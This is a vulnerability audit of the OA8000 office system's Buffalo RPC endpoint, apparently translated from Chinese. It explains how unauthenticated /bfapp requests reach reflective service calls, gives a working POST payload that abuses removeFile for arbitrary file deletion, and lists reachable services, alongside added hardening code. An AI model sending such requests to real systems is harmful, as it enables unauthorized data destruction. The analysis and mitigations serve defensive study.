1. Basic Information

The source code can be pulled out of the installer package yourself. This system ships with Tomcat 6; to debug it, edit the startup file
C:\Program Files (x86)\htoa\Tomcat\bin\InstallTomcat-NT.bat
and replace the service-install line with the one below (code 1).
rem Set Dirs & Mem
"%EXECUTABLE%" //US//%SERVICE_NAME% --Startup auto  --JvmOptions "-Xms%MEM_MIN%m;-Xmx%MEM_MAX%m;-XX:PermSize=%MEM_PEM_MIN%;-XX:MaxPermSize=%MEM_PEM_MAX%;-Dcatalina.base=%CATALINA_BASE%;-Dcatalina.home=%CATALINA_HOME%;-Djava.endorsed.dirs=%CATALINA_HOME%\common\endorsed;-Duser.timezone=GMT+08;-agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=5005" --StartMode jvm --StopMode jvm

2. Routing and Authentication Analysis

Let's start the running commentary, haha. First look at web.xml (code 1). There is only one Filter, and it does not perform authentication; it only applies some XSS filtering to certain requests. When auditing, import this jar from Tomcat's lib directory into your IDE, otherwise you simply won't find the class or be able to step into it. Below that comes webobjects. What is that? Here is the AI's explanation: its full name is Apple WebObjects (sometimes written WebObjects or WO), a Java (early versions were Objective-C) enterprise web application framework developed by Apple and first released in 1996. The WOServletAdaptor, JavaWebObjects and other libraries referenced in the web.xml you see all belong to this framework. After that comes buffalo; its name is Buffalo RPC (Buffalo for short), a lightweight Ajax/remote-call framework.
    <filter>
        <filter-name>OA8000Filter</filter-name>
        <filter-class>com.oa8000.filter.CrossScriptingFilter</filter-class>
    </filter>
    <filter-mapping>
        <filter-name>OA8000Filter</filter-name>
        <url-pattern>/WebObjects/*</url-pattern>
    </filter-mapping>

    <servlet>
        <servlet-name>WOServletAdaptor</servlet-name>
        <servlet-class>com.webobjects.jspservlet.WOServletAdaptor</servlet-class>
        <load-on-startup>5</load-on-startup>
    </servlet>
    <servlet-mapping>
        <servlet-name>WOServletAdaptor</servlet-name>
        <url-pattern>/WebObjects/*</url-pattern>
    </servlet-mapping>

    <servlet>
        <servlet-name>bfapp</servlet-name>
        <servlet-class>net.buffalo.web.servlet.ApplicationServlet</servlet-class>
    </servlet>
    <servlet-mapping>
        <servlet-name>bfapp</servlet-name>
        <url-pattern>/bfapp/*</url-pattern>
    </servlet-mapping>
With that basic understanding, let's look at how bfapp routes requests. Buffalo's code is written very clearly (figure 1). First it takes the extra path and checks whether it begins with /buffalo/; then it enters the validate method of the BuffaloWorker class, which checks that the request is a POST; finally it reaches the last method, processRequest (figure 2). Line 35 fetches our extra path (code 1); line 36 reads the contents of buffalo-service.properties (no path is configured in web.xml, so it is the fixed file buffalo-service.properties); line 37 checks whether the extra path matches an entry in that config file; then line 42 enters the invoke method, which, as the name suggests, is just a reflection call. At this point it is quite clear: we can invoke any class and method listed in the config file.

    protected String getWorkerRelativePath() {
        // Get the extra path (path info)
        String pathInfo = RequestContext.getContext().getHttpRequest().getPathInfo();
        // Split on "/", e.g. for /buffalo/oaPubptUploadService:
        //   terms[0] = ""
        //   terms[1] = "buffalo"
        //   terms[2] = "oaPubptUploadService"
        String[] terms = pathInfo.split("/");
        // Build the prefix "/buffalo/"
        String prefix = "/" + terms[1] + "/";
        // Take whatever follows "/buffalo/" in /buffalo/oaPubptUploadService, i.e. oaPubptUploadService
        String relative = pathInfo.substring(prefix.length());
        return relative;
    }
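
As the web.xml above shows, the only filter (CrossScriptingFilter) is mapped to /WebObjects/*, so requests to /bfapp/* reach ApplicationServlet with no filter in front of them, and Buffalo itself only checks the HTTP method and the service name. The following servlet Filter is an added example of how a defender would close that gap; it is not code from the original post, from Buffalo or from OA8000. It parses pathInfo the same way getWorkerRelativePath does, requires a logged-in session and restricts the service name to an explicit allowlist. The session attribute name loginUser, the package name and the allowlist contents are assumptions for illustration.

```java
// Added example (not from Buffalo or OA8000): an authentication and allowlist
// filter for the Buffalo endpoint, written against javax.servlet for Tomcat 6.
package com.example.hardening; // hypothetical package

import java.io.IOException;
import java.util.Arrays;
import java.util.Collections;
import java.util.HashSet;
import java.util.Set;

import javax.servlet.Filter;
import javax.servlet.FilterChain;
import javax.servlet.FilterConfig;
import javax.servlet.ServletException;
import javax.servlet.ServletRequest;
import javax.servlet.ServletResponse;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import javax.servlet.http.HttpSession;

public class BuffaloAuthFilter implements Filter {

    // Assumed: the application's login code stores the user object under this key.
    private static final String LOGIN_ATTR = "loginUser";

    // Assumed: the services the browser front end genuinely needs. Everything else
    // in buffalo-service.properties (demo services included) stays unreachable.
    private static final Set<String> ALLOWED_SERVICES = Collections.unmodifiableSet(
            new HashSet<String>(Arrays.asList("desktopService", "topMenuService", "portalService")));

    public void init(FilterConfig filterConfig) { }

    public void destroy() { }

    /** Same split as getWorkerRelativePath(): "/buffalo/fooService" -> "fooService". */
    static String serviceNameFromPathInfo(String pathInfo) {
        if (pathInfo == null) return null;
        String[] terms = pathInfo.split("/");
        if (terms.length < 3 || !"buffalo".equals(terms[1])) return null;
        return terms[2];
    }

    public void doFilter(ServletRequest req, ServletResponse res, FilterChain chain)
            throws IOException, ServletException {
        HttpServletRequest request = (HttpServletRequest) req;
        HttpServletResponse response = (HttpServletResponse) res;

        // Buffalo only dispatches POST (BuffaloWorker.validate); mirror that here.
        if (!"POST".equals(request.getMethod())) {
            response.sendError(HttpServletResponse.SC_METHOD_NOT_ALLOWED);
            return;
        }

        // No session, or a session without a logged-in user: reject before dispatch.
        HttpSession session = request.getSession(false);
        if (session == null || session.getAttribute(LOGIN_ATTR) == null) {
            response.sendError(HttpServletResponse.SC_UNAUTHORIZED);
            return;
        }

        // Only allowlisted service names may reach the reflective invoke().
        String service = serviceNameFromPathInfo(request.getPathInfo());
        if (service == null || !ALLOWED_SERVICES.contains(service)) {
            response.sendError(HttpServletResponse.SC_FORBIDDEN);
            return;
        }

        chain.doFilter(req, res);
    }
}
```

To activate it, register the class in web.xml with a filter-mapping whose url-pattern is /bfapp/*, placed before any other mapping for that path. Because the filter is mapped on the bfapp servlet's path, request.getPathInfo() yields the same "/buffalo/<serviceName>" string that BuffaloWorker sees. Independently of the filter, the demo entries in buffalo-service.properties (net.buffalo.demo.* and tutorial.Service1) serve no purpose in production and are best removed, since every entry in that file is a reflection target.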

3. Vulnerabilities

There are a great many vulnerabilities here, of all kinds. Code 1: oaPubptUploadService maps to the class com.oa8000.component.OaPubptUploadService; following it in (figure 1) gives arbitrary file deletion.
Request:
POST /OAapp/bfapp/buffalo/oaPubptUploadService HTTP/1.1
Host: 192.168.1.146:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:151.0) Gecko/20100101 Firefox/151.0
Content-Length: 106

<buffalo-call><method>removeFile</method><string>C:\Program Files (x86)\htoa\1.txt</string></buffalo-call>
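
The request above hands removeFile an absolute path, and the method deletes whatever it is given. The class below is an added example of the confined form of such a method, not the original OaPubptUploadService code: the caller-supplied value is treated strictly as a name under a fixed upload directory, canonicalized, and rejected if it is absolute or resolves outside that directory. The base directory, class name and the temporary files created in main are assumptions used for illustration; it is written Java 6 style (java.io.File) to match the Tomcat 6 era of the target.

```java
// Added example (not the original OaPubptUploadService.removeFile): deletion
// confined to a single upload directory.
package com.example.hardening; // hypothetical package

import java.io.File;
import java.io.IOException;

public class ConfinedFileRemover {

    private final File baseDir;

    // baseDir is assumed to be the application's upload directory.
    public ConfinedFileRemover(File baseDir) throws IOException {
        this.baseDir = baseDir.getCanonicalFile();
    }

    /**
     * Resolves the caller-supplied name relative to baseDir and refuses anything
     * that is absolute or canonicalizes outside baseDir ("..", symlinks out of the
     * tree). Returns the canonical file to delete, or null if the request is rejected.
     */
    File resolveInsideBase(String requested) throws IOException {
        if (requested == null || requested.length() == 0) return null;
        // An absolute path is never a legitimate reference to an uploaded file.
        if (new File(requested).isAbsolute()) return null;
        File candidate = new File(baseDir, requested).getCanonicalFile();
        // Compare with a trailing separator so "/uploads2" does not pass for "/uploads".
        String basePrefix = baseDir.getPath() + File.separator;
        if (!candidate.getPath().startsWith(basePrefix)) return null;
        return candidate;
    }

    /** Deletes only regular files inside baseDir; returns false for anything rejected. */
    public boolean removeFile(String requested) throws IOException {
        File target = resolveInsideBase(requested);
        if (target == null || !target.isFile()) return false;
        return target.delete();
    }

    // Stand-alone demonstration on a constructed temporary upload directory.
    public static void main(String[] args) throws IOException {
        File uploads = File.createTempFile("uploads", "");
        uploads.delete();
        uploads.mkdir();
        new File(uploads, "report.txt").createNewFile();

        ConfinedFileRemover remover = new ConfinedFileRemover(uploads);
        System.out.println("report.txt: " + remover.removeFile("report.txt"));
        System.out.println("traversal:  " + remover.removeFile("../../outside.txt"));
        System.out.println("absolute:   " + remover.removeFile(uploads.getPath() + File.separator + "x.txt"));
        uploads.delete();
    }
}
```

The same check applies to every file-handling method reachable through the reflective invoke(): the service should never receive a path, only a name or identifier that the server maps onto a directory it owns. On Java 7 and later, java.nio.file.Path.normalize() followed by Path.startsWith(baseDir) expresses the same rule.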

There are plenty more vulnerabilities; I won't go through them here. For reference, the full buffalo-service.properties is below.
#
# Buffalo Service Config
#
# Author: Michael Chen
#         Mail: mechiland AT gmail dot com
#         Blog: http://michael.nona.name (Simplified Chinese)
# Buffalo Forum: http://groups.google.com/group/amowa (zh_CN)
#
         
# serviceName=serviceClass

# simpleService, The simple Service
simpleService=net.buffalo.demo.simple.SimpleService

# The number guess service
numberService=net.buffalo.demo.numberguess.NumberGuessService

desktopService = com.oa8000.mainapp.DesktopService

tutorialService=tutorial.Service1

ajaxService=net.buffalo.demo.ajax.J2EEAjaxService

pageService=net.buffalo.demo.page.PageService

planService = com.oa8000.server.htplan.HtPlanServer
fileService = com.oa8000.server.htfile.HtFileServer
workFlowService=com.oa8000.httrace.httrace01.manager.HtTrace01SqlProcess

topMenuService = com.oa8000.mainapp.TopMenuService
applicationFormService = com.oa8000.proj.root.ApplicationFormService
forumArticleDetailService = com.oa8000.proj.root.ForumArticleDetailService
hrApplicationFormService = com.oa8000.server.hthr.HtHrServer
hrWorkApplicationFormService = com.oa8000.server.hthrwork.HtHrWorkServer
oaPubptUploadService = com.oa8000.component.OaPubptUploadService


htManager00Service = com.oa8000.htmanager.htmanager00.HtManager00Service
renameService=com.oa8000.htfile.htfile01.manager.HtFile01Manager

oaPubptUploadService = com.oa8000.component.OaPubptUploadService
carService = com.oa8000.server.htcar.HtCarServer
smsService = com.oa8000.server.htmsg.HtMsgSmsServer
meetingService = com.oa8000.server.htmeeting.HtMeetingServer
booksService = com.oa8000.server.htbooks.HtBooksServer
portalService = com.oa8000.server.htportal.HtPortalAjaxServer

photoService = com.oa8000.htphoto.htphoto00.HtPhoto00Service

taskService=com.oa8000.httask.httask01.manager.HtTask01Manager

htAssets0123Service = com.oa8000.htassets.htassets00.HtAssets00Service

salaryService = com.oa8000.server.htsalary.HtSalaryServer

portalArticleService = com.oa8000.htportal.htportal02.service.HtPortal02Service

# Used by the portal online survey
voteService = com.oa8000.server.htportal.HtVoteServer
# Used by portal approval
traceForeignService=com.oa8000.server.httrace.HtTraceForeignServer
# Used by portal system usage frequency statistics
frequencyService = com.oa8000.server.htmanager.HtManagerServer
# Used by portal forum statistics
forumService=com.oa8000.server.htforum.HtForumServer
htExamService = com.oa8000.server.htexam.HtExamServer

# Used by recruitment management statistics
recruitmentService = com.oa8000.htrecruitment.htrecruitment.manager
# Used by budgeting
bugetService = com.oa8000.htbuget.htbuget01.manager.HtBuget01Manager
# Training plan
htTrain0116Service = com.oa8000.httrain.httrain00.HtTrain00Service
# Budget interface
bugetServer = com.oa8000.server.htbuget.HtBugetServer